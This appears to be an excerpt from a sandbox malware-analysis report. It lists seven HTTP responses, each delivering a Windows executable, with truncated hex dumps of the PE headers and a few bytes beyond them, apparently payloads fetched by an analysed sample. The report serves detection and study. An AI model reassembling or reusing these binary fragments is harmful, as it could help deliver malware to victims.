Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:18 GMTContent-Type: application/octet-streamContent-Length: 4278784Last-Modified: Thu, 12 Sep 2024 13:56:06 GMTConnection: keep-aliveETag: "66e2f2f6-414a00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 41 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 09 00 78 22 00 00 00 20 0a 00 00 82 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 40 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 b9 08 00 00 10 00 00 00 ba 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 20 2d 00 00 00 d0 08 00 00 2e 00 00 00 be 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 01 0f 00 00 00 00 09 00 00 00 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 78 22 00 00 00 10 09 00 00 24 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 09 00 00 00 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 50 09 00 00 02 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 40 b5 00 00 00 60 09 00 00 b6 00 00 00 12 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 82 37 00 00 20 0a 00 00 82 37 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 41 00 00 00 00 00 00 4a 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:25 GMTContent-Type: application/octet-streamContent-Length: 419328Last-Modified: Thu, 26 Sep 2024 16:40:28 GMTConnection: keep-aliveETag: "66f58e7c-66600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b d9 e1 fd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 06 00 00 1a 00 00 00 00 00 00 ae 68 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 68 06 00 4b 00 00 00 00 80 06 00 f4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 48 06 00 00 20 00 00 00 4a 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 16 00 00 00 80 06 00 00 18 00 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 64 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 68 06 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 5b 03 00 a0 aa 02 00 03 00 00 00 dd 04 00 06 ac 05 06 00 c0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 05 05 00 06 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 32 03 00 04 28 bf 05 00 06 a2 25 17 1f 47 7e 32 03 00 04 28 bf 05 00 06 a2 25 18 1f 48 7e 32 03 00 04 28 bf 05 00 06 a2 25 19 1f 65 7e 32 03 00 04 28 bf 05 00 06 a2 7e 33 03 00 04 28 c3 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 e1 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 32 03 00 04 28 bf 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 32 03 00 04 28 bf 05 00 06 13 08 00 38 43 00 00 00 00 11 05 1f 1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:28 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
